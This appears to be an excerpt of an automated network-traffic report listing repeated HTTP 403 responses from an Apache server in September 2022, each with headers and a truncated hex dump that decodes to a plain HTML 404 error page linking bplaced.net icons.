        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:29 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=110X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:30 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=129X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:31 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=116X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:32 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=123X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:33 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=114X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:34 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=111X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:35 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=113X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 